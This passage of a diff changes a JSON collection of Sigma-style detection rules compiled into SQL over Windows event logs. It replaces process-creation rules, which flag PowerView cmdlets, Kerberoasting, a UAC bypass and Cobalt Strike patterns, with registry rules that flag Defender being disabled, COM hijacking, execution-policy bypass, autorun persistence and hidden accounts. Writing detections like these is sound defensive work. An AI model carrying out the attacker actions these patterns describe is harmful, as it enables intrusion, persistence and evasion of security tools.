LIKE '%Get-DomainSPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSubnet%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestGlobalCatalog%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-GptTmpl%' ESCAPE '\\' OR CommandLine LIKE '%Get-GroupsXML%' ESCAPE '\\' OR CommandLine LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetComputer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetForest%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetGPO%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetGroupMember%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetLoggedon%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetProcess%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetShare%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSite%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSubnet%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetUser%' ESCAPE '\\' OR CommandLine LIKE '%Get-PathAcl%' ESCAPE '\\' OR CommandLine LIKE '%Get-PrincipalContext%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegCachedRDPConnection%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegLastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegProxy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharefinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR CommandLine LIKE '%Remove-DomainObjectAcl%' ESCAPE '\\' OR CommandLine LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Request-SPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Set-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Test-AdminAccess%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'Setvalue' AND (TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\(Default)' ESCAPE '\\' AND NewValue = 'Service') AND NOT ((NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\SAVService\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\SAVService\\\\(Default)' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_hktl_sharpview.yml" + "filename": "registry_set_add_load_service_in_safe_mode.yml" }, { - "title": "UEFI Persistence Via Wpbbin - ProcessCreation", - "id": "4abc0ec4-db5a-412f-9632-26659cddf145", + "title": "Disable Macro Runtime Scan Scope", + "id": "ab871450-37dc-4a3a-997f-6662aa8ae0f1", + "description": "Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros", "status": "experimental", - "description": "Detects execution of the binary \"wpbbin\" which is used as part of the UEFI based persistence method described in the reference section", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1542.001" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Common\\\\Security%' ESCAPE '\\' AND TargetObject LIKE '%\\\\MacroRuntimeScanScope' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_wpbbin_potential_persistence.yml" + "filename": "registry_set_disable_macroruntimescanscope.yml" }, { - "title": "Suspicious Vsls-Agent Command With AgentExtensionPath Load", - "id": "43103702-5886-11ed-9b6a-0242ac120002", + "title": "Windows Defender Service Disabled", + "id": "e1aa95de-610a-427d-b9e7-9b46cfafbe6a", "status": "experimental", - "description": "Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with a suspicious library load using the --agentExtensionPath parameter", - "author": "bohops", + "description": "Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry", + "author": "Ján Trenčanský, frack113, AlertIQ, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1562.001" ], "falsepositives": [ - "False positives depend on custom use of vsls-agent.exe" + "Administrator actions" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\vsls-agent.exe' ESCAPE '\\' AND CommandLine LIKE '%--agentExtensionPath%' ESCAPE '\\') AND NOT (CommandLine LIKE '%Microsoft.VisualStudio.LiveShare.Agent.%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\WinDefend\\\\Start' ESCAPE '\\' AND NewValue = 'DWORD (0x00000004)')" ], - "filename": "proc_creation_win_vslsagent_agentextensionpath_load.yml" + "filename": "registry_set_disable_windows_defender_service.yml" }, { - "title": "New Root Certificate Installed Via CertMgr.EXE", - "id": "ff992eac-6449-4c60-8c1d-91c9722a1d48", + "title": "Suspicious Printer Driver Empty Manufacturer", + "id": "e0813366-0407-449a-9869-a2db1119dc41", "status": "test", - "description": "Detects execution of \"certmgr\" with the \"add\" flag in order to install a new certificate on the system.\nAdversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.\n", - "author": "oscd.community, @redcanary, Zach Stanford @svch0st", + "description": "Detects a suspicious printer driver installation with an empty Manufacturer value", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1553.004" + "attack.privilege_escalation", + "attack.t1574", + "cve.2021.1675" ], "falsepositives": [ - "Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP" + "Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\CertMgr.exe' ESCAPE '\\' OR OriginalFileName = 'CERTMGT.EXE') AND (CommandLine LIKE '%/add%' ESCAPE '\\' AND CommandLine LIKE '%root%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Manufacturer%' ESCAPE '\\' AND NewValue = '(Empty)') AND NOT ((TargetObject LIKE '%\\\\CutePDF Writer v4.0\\\\%' ESCAPE '\\') OR ((TargetObject LIKE '%\\\\VNC Printer (PS)\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\VNC Printer (UD)\\\\%' ESCAPE '\\')) OR (TargetObject LIKE '%\\\\Version-3\\\\PDF24\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_certmgr_certificate_installation.yml" + "filename": "registry_set_susp_printer_driver.yml" }, { - "title": "Ie4uinit Lolbin Use From Invalid Path", - "id": "d3bf399f-b0cf-4250-8bb4-dfc192ab81dc", + "title": "Potential Persistence Via COM Hijacking From Suspicious Locations", + "id": "3d968d17-ffa4-4bc0-bfdc-f139de76ce77", "status": "experimental", - "description": "Detect use of ie4uinit.exe to execute commands from a specially prepared ie4uinit.inf file from a directory other than the usual directories", - "author": "frack113", + "description": "Detects potential COM object hijacking where the \"Server\" (In/Out) is pointing to a supsicious or unsuale location", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.persistence", + "attack.t1546.015" ], "falsepositives": [ - "ViberPC updater calls this binary with the following commandline \"ie4uinit.exe -ClearIconCache\"" + "Probable legitimate applications. If you find these please add them to an exclusion list" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ie4uinit.exe' ESCAPE '\\' OR OriginalFileName = 'IE4UINIT.EXE') AND NOT (((CurrentDirectory LIKE 'c:\\\\windows\\\\system32\\\\' ESCAPE '\\' OR CurrentDirectory LIKE 'c:\\\\windows\\\\sysWOW64\\\\' ESCAPE '\\')) OR (CurrentDirectory = '')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE 'HKCR\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_CLASSES\\_ROOT\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_CURRENT\\_USER\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\InprocServer32\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%\\\\LocalServer32\\\\(Default)' ESCAPE '\\') AND (NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\System32\\\\spool\\\\drivers\\\\color\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%temp\\%%' ESCAPE '\\' OR NewValue LIKE '%\\%tmp\\%%' ESCAPE '\\' OR NewValue LIKE '%\\%appdata\\%%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_ie4uinit.yml" + "filename": "registry_set_persistence_com_hijacking_susp_locations.yml" }, { - "title": "Use of Pcalua For Execution", - "id": "0955e4e1-c281-4fb9-9ee1-5ee7b4b754d2", + "title": "Potential PowerShell Execution Policy Tampering", + "id": "fad91067-08c5-4d1a-8d8c-d96a21b37814", "status": "experimental", - "description": "Detects execition of commands and binaries from the context of The program compatibility assistant (Pcalua.exe). This can be used as a LOLBIN in order to bypass application whitelisting.", - "author": "Nasreddine Bencherchali (Nextron Systems), E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "description": "Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate use by a via a batch script or by an administrator." + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\pcalua.exe' ESCAPE '\\' AND CommandLine LIKE '% -a%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\ShellIds\\\\Microsoft.PowerShell\\\\ExecutionPolicy' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ExecutionPolicy' ESCAPE '\\') AND (NewValue LIKE '%Bypass%' ESCAPE '\\' OR NewValue LIKE '%RemoteSigned%' ESCAPE '\\' OR NewValue LIKE '%Unrestricted%' ESCAPE '\\')) AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_lolbin_pcalua.yml" + "filename": "registry_set_powershell_execution_policy.yml" }, { - "title": "Suspicious PowerShell Command Line", - "id": "d7bcd677-645d-4691-a8d4-7a5602b780d1", - "status": "test", - "description": "Detects the PowerShell command lines with special characters", - "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)", + "title": "Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting", + "id": "396ae3eb-4174-4b9b-880e-dc0364d78a19", + "status": "experimental", + "description": "Detects the modification of Outlook setting \"LoadMacroProviderOnBoot\" which if enabled allows the automatic loading of any configured VBA project/module", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" ], "falsepositives": [ - "Unlikely", - "Amazon SSM Document Worker", - "Windows Defender ATP" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*') OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*') OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\{.*\\{.*\\{.*\\{.*\\{.*') OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\^.*\\^.*\\^.*\\^.*\\^.*') OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*`.*`.*`.*`.*`.*')) AND NOT (ParentProcessName LIKE 'C:\\\\Program Files\\\\Amazon\\\\SSM\\\\ssm-document-worker.exe' ESCAPE '\\')) AND NOT (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\{.*\\{.*\\{.*\\{.*\\{.*' AND (CommandLine LIKE '%new EventSource(\"Microsoft.Windows.Sense.Client.Management\"%' ESCAPE '\\' OR CommandLine LIKE '%public static extern bool InstallELAMCertificateInfo(SafeFileHandle handle);%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\LoadMacroProviderOnBoot' ESCAPE '\\' AND NewValue LIKE '%0x00000001%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_cmdline_special_characters.yml" + "filename": "registry_set_office_outlook_enable_load_macro_provider_on_boot.yml" }, { - "title": "Potential UAC Bypass Via Sdclt.EXE", - "id": "40f9af16-589d-4984-b78d-8c2aec023197", - "status": "test", - "description": "A General detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for bypass UAC techniques.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Wow6432Node CurrentVersion Autorun Keys Modification", + "id": "b29aed60-ebd1-442b-9cb5-16a1d0324adb", + "status": "experimental", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unknown" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%sdclt.exe' ESCAPE '\\' AND IntegrityLevel = 'High')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\ShellServiceObjectDelayLoad%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnceEx\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServices\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServicesOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellServiceObjects%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellIconOverlayIdentifiers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellExecuteHooks%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\SharedTaskScheduler%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)') OR (NewProcessName LIKE '%C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\setup.exe%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\OfficeClickToRun.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Office\\\\ClickToRun\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Wow6432Node\\\\%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\') AND TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects\\\\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}\\\\%' ESCAPE '\\') OR (NewValue LIKE '%-A251-47B7-93E1-CDD82E34AF8B}' ESCAPE '\\' OR NewValue = 'grpconv -o' OR NewValue LIKE '%C:\\\\Program Files%' ESCAPE '\\' AND NewValue LIKE '%\\\\Dropbox\\\\Client\\\\Dropbox.exe%' ESCAPE '\\' AND NewValue LIKE '% /systemstartup%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects\\\\{92EF2EAD-A7CE-4424-B0DB-499CF856608E}\\\\NoExplorer' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\windowsdesktop-runtime-%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\{e2d1ae32-dd1d-4ad7-a298-10e42e7840fc}' ESCAPE '\\' OR TargetObject LIKE '%\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\{7037b699-7382-448c-89a7-4765961d2537}' ESCAPE '\\') AND NewValue LIKE '\"C:\\\\ProgramData\\\\Package Cache\\\\%' ESCAPE '\\' AND NewValue LIKE '%.exe\" /burn.runonce' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (NewValue LIKE '\"C:\\\\ProgramData\\\\Package Cache\\\\{d21a4f20-968a-4b0c-bf04-a38da5f06e41}\\\\windowsdesktop-runtime-%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\VC\\_redist.x64.exe' ESCAPE '\\' AND NewValue LIKE '%}\\\\VC\\_redist.x64.exe\" /burn.runonce' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\ProgramData\\\\Package Cache%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\winsdksetup.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\windowsdesktop-runtime-%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AspNetCoreSharedFrameworkBundle-%' ESCAPE '\\') AND NewValue LIKE '% /burn.runonce' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_sdclt.yml" + "filename": "registry_set_asep_reg_keys_modification_wow6432node.yml" }, { - "title": "Potential Persistence Via Powershell Search Order Hijacking - Task", - "id": "b66474aa-bd92-4333-a16c-298155b120df", - "status": "experimental", - "description": "Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. This could be a sign of persistence via PowerShell \"Get-Variable\" technique as seen being used in Colibri Loader", - "author": "pH-T (Nextron Systems), Florian Roth (Nextron Systems)", + "title": "Hiding User Account Via SpecialAccounts Registry Key", + "id": "f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd", + "status": "test", + "description": "Detects modifications to the registry key \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" where the value is set to \"0\" in order to hide user account from being listed on the logon screen.", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1564.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k netsvcs%' ESCAPE '\\' AND ParentCommandLine LIKE '%-s Schedule%' ESCAPE '\\' AND (CommandLine LIKE '% -windowstyle hidden' ESCAPE '\\' OR CommandLine LIKE '% -w hidden' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass' ESCAPE '\\' OR CommandLine LIKE '% -noni' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\UserList%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_schtasks_powershell_persistence.yml" + "filename": "registry_set_special_accounts.yml" }, { - "title": "Suspicious Kernel Dump Using Dtrace", - "id": "7124aebe-4cd7-4ccb-8df0-6d6b93c96795", - "status": "test", - "description": "Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1", - "author": "Florian Roth (Nextron Systems)", + "title": "Activate Suppression of Windows Security Center Notifications", + "id": "0c93308a-3f1b-40a9-b649-57ea1a1c1d63", + "status": "experimental", + "description": "Detect set Notification_Suppress to 1 to disable the windows security center notification", + "author": "frack113", + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\dtrace.exe' ESCAPE '\\' AND CommandLine LIKE '%lkd(0)%' ESCAPE '\\') OR (CommandLine LIKE '%syscall:::return%' ESCAPE '\\' AND CommandLine LIKE '%lkd(%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\UX Configuration\\\\Notification\\_Suppress' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_dtrace_kernel_dump.yml" + "filename": "registry_set_suppress_defender_notifications.yml" }, { - "title": "CobaltStrike Process Patterns", - "id": "f35c5d71-b489-4e22-a115-f003df287317", + "title": "Suspicious Application Allowed Through Exploit Guard", + "id": "42205c73-75c8-4a63-9db1-e3782e06fda0", "status": "experimental", - "description": "Detects process patterns found in Cobalt Strike beacon activity (see reference for more details) and also cases in which a China Chopper like webshell is used to run whoami", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects applications being added to the \"allowed applications\" list of exploit guard in order to bypass controlled folder settings", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Other programs that cause these patterns (please report)" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((CommandLine LIKE '%\\\\cmd.exe /C whoami%' ESCAPE '\\' AND ParentProcessName LIKE 'C:\\\\Temp%' ESCAPE '\\') OR ((CommandLine LIKE '%cmd.exe /c echo%' ESCAPE '\\' OR CommandLine LIKE '%> \\\\\\\\.\\\\pipe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\whoami.exe%' ESCAPE '\\') AND ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\runonce.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\runonce.exe' ESCAPE '\\')) OR ((CommandLine LIKE '%conhost.exe 0xffffffff -ForceV1%' ESCAPE '\\' AND (ParentCommandLine LIKE '%/C whoami%' ESCAPE '\\' OR ParentCommandLine LIKE '%cmd.exe /C echo%' ESCAPE '\\' OR ParentCommandLine LIKE '% > \\\\\\\\.\\\\pipe%' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%C:\\\\Program Files (x86)\\\\Internet Download Manager\\\\IDMMsgHost.exe%' ESCAPE '\\' OR ParentCommandLine LIKE '%chrome-extension://%' ESCAPE 